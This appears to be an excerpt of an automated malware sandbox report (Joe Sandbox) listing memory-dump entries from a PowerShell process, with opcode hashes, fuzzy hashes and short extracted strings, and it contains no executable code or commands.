                                                                                      • Snapshot File: hcaresult_4_2_8720000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2937ce4a8e56ee4ade5054c182c0353510b9040d90465c8ee21261d174549637
                                                                                      • Instruction ID: 5f72f0ce3d04f5f20116c9d8fb64c7eae6c8132d7c0817965169c0e1dabb8d26
                                                                                      • Opcode Fuzzy Hash: 2937ce4a8e56ee4ade5054c182c0353510b9040d90465c8ee21261d174549637
                                                                                      • Instruction Fuzzy Hash: 08A02230A8030C8B8A8032B8300888E330E8080823380882AF80C83E00CF32E8A808C8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1390758738.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_8720000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f449eab2fce15f2cf9a096cab9a217494fe6c56529ddaec6be8a1e61c16c8482
                                                                                      • Instruction ID: 6c5d7fffd09e855cf12c3cedc502d332f411a29c3bb9a8a78b666bbf98ed3251
                                                                                      • Opcode Fuzzy Hash: f449eab2fce15f2cf9a096cab9a217494fe6c56529ddaec6be8a1e61c16c8482
                                                                                      • Instruction Fuzzy Hash: 64A0223088030C8B820032B03008C08B30E80808023808828E80C83A08CF32E82008C0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1390758738.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_8720000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5677bf2b42d92c87a1018ee55c6bcd12976a9f4a762a54532ea8c2bf4cb82840
                                                                                      • Instruction ID: 330b58caf1048538829b03b528a802078efec6459de5178b3c04ea9947a45a55
                                                                                      • Opcode Fuzzy Hash: 5677bf2b42d92c87a1018ee55c6bcd12976a9f4a762a54532ea8c2bf4cb82840
                                                                                      • Instruction Fuzzy Hash: C7A0223088030C8B820032B03008808B30E80808023808828E80C8BA00CF32F82088C0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1390758738.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_8720000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: efcab39784fe4dd0d675dac38c48dc66aa95122129356374ce87009956e6ed1d
                                                                                      • Instruction ID: edfc44f1b642d33e862eb5f548a375da012d70fe9312732b90297c73a31603d4
                                                                                      • Opcode Fuzzy Hash: efcab39784fe4dd0d675dac38c48dc66aa95122129356374ce87009956e6ed1d
                                                                                      • Instruction Fuzzy Hash: A5A0223088030C8F830032B03008808330EA080802B808828F80C83A08CF32E83008C0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1390758738.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_8720000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 18564a534101c9ee992ad0e2b1e6803498084905d75c507344e4357497da9613
                                                                                      • Instruction ID: 4d50501bfe98469df0789cc6428530917c1f0d10ba4b52e72e5612b75d06fa71
                                                                                      • Opcode Fuzzy Hash: 18564a534101c9ee992ad0e2b1e6803498084905d75c507344e4357497da9613
                                                                                      • Instruction Fuzzy Hash: B8A0223088030C8B820032B2300880CB30E8080802380C828E80C8BA02CF32E8208AC0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1390758738.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_8720000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a71eda79ef64b770cf35a4d58e8aa87a8154a6a16b7a9ae16d9c20efba97e9de
                                                                                      • Instruction ID: 38c244b9227aeae35c92405341f066fd393dad822ec12c419ab2f6b9f407466f
                                                                                      • Opcode Fuzzy Hash: a71eda79ef64b770cf35a4d58e8aa87a8154a6a16b7a9ae16d9c20efba97e9de
                                                                                      • Instruction Fuzzy Hash: 88A0223088030C8B820032B03008808B30E8080802380C828E80C83A0ACF32E82008C0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1390758738.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_8720000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cba1d5e4862725212de3df089a6a1282fee2541e467085ef96c9eab3f3957e39
                                                                                      • Instruction ID: d14b0ed1e3af7712ad6ca9e6163d9abdd12afdac20ee34ce9f4198c94dd24b51
                                                                                      • Opcode Fuzzy Hash: cba1d5e4862725212de3df089a6a1282fee2541e467085ef96c9eab3f3957e39
                                                                                      • Instruction Fuzzy Hash: 2EB0123044020C8F83097B60A0494187B3D96405013008459D40D4F511CF318811CB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1390758738.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_8720000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 93384c3d0067692ba4af8d68e7e814f5c6e8b953fc4c9055aa736bfe64aea850
                                                                                      • Instruction ID: 7b78c0d0069de0cbce3dbdeab46ae820db59e7450ef3eb1a30edcd0e30d8dcd5
                                                                                      • Opcode Fuzzy Hash: 93384c3d0067692ba4af8d68e7e814f5c6e8b953fc4c9055aa736bfe64aea850
                                                                                      • Instruction Fuzzy Hash: 67A0223088030CCF8A0032B03008808BB0E88C08023808828F80C8BA00EF32E82008C0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1383309193.0000000007F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a3872a1c74b0822931816057ea2c3c6d78071513bd7cb7adbeb310055a1b6cc1
                                                                                      • Instruction ID: aa7568471c24b642ca0eef57f97030f7351818590365929177f3ff10fe4176df
                                                                                      • Opcode Fuzzy Hash: a3872a1c74b0822931816057ea2c3c6d78071513bd7cb7adbeb310055a1b6cc1
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1384527948.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7fa0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LR)r$LR)r
                                                                                      • API String ID: 0-2778061799
                                                                                      • Opcode ID: 7f92f06de580e7da574ec1b796073fbf9c21c20b7d59a32be5cec34318cb4a68
                                                                                      • Instruction ID: 6b5cf52efd7f07da4fb8414e04a08595d8ead772c0ee1c5e254aa4a616a92dff
                                                                                      • Opcode Fuzzy Hash: 7f92f06de580e7da574ec1b796073fbf9c21c20b7d59a32be5cec34318cb4a68
                                                                                      • Instruction Fuzzy Hash: E0514EB1E10105EFDB08DFA8D855BAE7BB2EF88301F188469E516A7390DB719C41CFA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1383309193.0000000007F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: </d$</d$</d$</d$H.d$x.d$$)r$$)r
                                                                                      • API String ID: 0-3644986839
                                                                                      • Opcode ID: 674c8e564225688dd1368658ff861e0791f68f6c5c23a72a00475894a88711a9
                                                                                      • Instruction ID: 4a08697ed53ea8c7fc0174dcab74476aa4d7d25e2c3432713672b6f6e1a84787
                                                                                      • Opcode Fuzzy Hash: 674c8e564225688dd1368658ff861e0791f68f6c5c23a72a00475894a88711a9
                                                                                      • Instruction Fuzzy Hash: 0121F6B2A1E3D94FD323876448251557F719F93210B2E05DBD1D2CBAA7E6248C05C3A3
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1383309193.0000000007F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $)r$$)r$$)r$$)r$$)r$$)r
                                                                                      • API String ID: 0-724389435
                                                                                      • Opcode ID: c94f13b66766f485851df366cd39bf7f70fbc0730873f418d3f303b910f691e5
                                                                                      • Instruction ID: a877670c392cf68b53c600d367b0fbc3c8a0d74e2293357d1a7835717987e549
                                                                                      • Opcode Fuzzy Hash: c94f13b66766f485851df366cd39bf7f70fbc0730873f418d3f303b910f691e5
                                                                                      • Instruction Fuzzy Hash: 93614CB2B083128BDB259A7D8854277FBE2AFC6210B2C847FD585D7386DE31D845C3A1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1383309193.0000000007F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (o)r$(o)r$(o)r$(o)r$xbb
                                                                                      • API String ID: 0-174032641
                                                                                      • Opcode ID: 22f704f5d7af011021ff76b39453b5cf887bf8edae36e94e767ecfa1ae1c6510
                                                                                      • Instruction ID: 2a7b70508c8a54a639a2cba27ef3ec5d0dad88166f233fc79e8e952b80385eb1
                                                                                      • Opcode Fuzzy Hash: 22f704f5d7af011021ff76b39453b5cf887bf8edae36e94e767ecfa1ae1c6510
                                                                                      • Instruction Fuzzy Hash: 14F106B1B08386DFDB25EF68C80877A7BF2AF86211F28846AD555CB291DB31C941C761
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1383309193.0000000007F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4')r$4')r$tP)r$tP)r$$)r
                                                                                      • API String ID: 0-1694121873
                                                                                      • Opcode ID: 3b7f721a214b7abc229977b8d0bb0f8721f862f2565d7d5d2e2f8c5e6e82abe3
                                                                                      • Instruction ID: c1734acfbb0d015a832dd7c394fa2d342f572002baa0585d2988e5d7595a5683
                                                                                      • Opcode Fuzzy Hash: 3b7f721a214b7abc229977b8d0bb0f8721f862f2565d7d5d2e2f8c5e6e82abe3
                                                                                      • Instruction Fuzzy Hash: 4E6139B5B04296EFDF20DF68D5087BAB7E2AF85200F184059E951AB2C0DB31CD61C7E2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1383309193.0000000007F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4')r$tP)r$$)r$$)r$$)r
                                                                                      • API String ID: 0-2147510326
                                                                                      • Opcode ID: 147904df8543bf996cb03623e779199a30150bc7a4e08ff6d2735be8874cef0b
                                                                                      • Instruction ID: 483ba5d906cc90d3e1bdd2cf40f16f1bf1fe65ec995aba1e46d40240e0336ae8
                                                                                      • Opcode Fuzzy Hash: 147904df8543bf996cb03623e779199a30150bc7a4e08ff6d2735be8874cef0b
                                                                                      • Instruction Fuzzy Hash: E161B6F1A14216DFDB348E18C64C7BA77A2AB45315F2C80A6E8157B294C771DDB0CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1383309193.0000000007F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $)r$$)r$$)r$$)r
                                                                                      • API String ID: 0-3891146080
                                                                                      • Opcode ID: b681c8d91438e94d047ae0cd466e681c198d0baef5efcb28fceb25e029a90986
                                                                                      • Instruction ID: 4ae8c0eb08808a3e2f7b5a083beb19a9f74e91f0431dcb60273e70d938d7ce25
                                                                                      • Opcode Fuzzy Hash: b681c8d91438e94d047ae0cd466e681c198d0baef5efcb28fceb25e029a90986
                                                                                      • Instruction Fuzzy Hash: 422123B67203025BFB7496699808F77B7CBEBC5651F38852AE549E7385EE71C840C3A0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1383309193.0000000007F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $)r$$)r$$)r$$)r
                                                                                      • API String ID: 0-3891146080
                                                                                      • Opcode ID: 6b7f45914f0250ea85a6b41a4de3a4c5fc938d40df3e36fe19e2563694f1f6f0
                                                                                      • Instruction ID: 19713964bae1509096f94f6b0e7bb6b731f610e9d249c0bbfdf420a70a0f9a94
                                                                                      • Opcode Fuzzy Hash: 6b7f45914f0250ea85a6b41a4de3a4c5fc938d40df3e36fe19e2563694f1f6f0
                                                                                      • Instruction Fuzzy Hash: E92100B6E00303DFCB708E698948276BBF1BF83214F1C41AED84597246DB31D588DB96
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%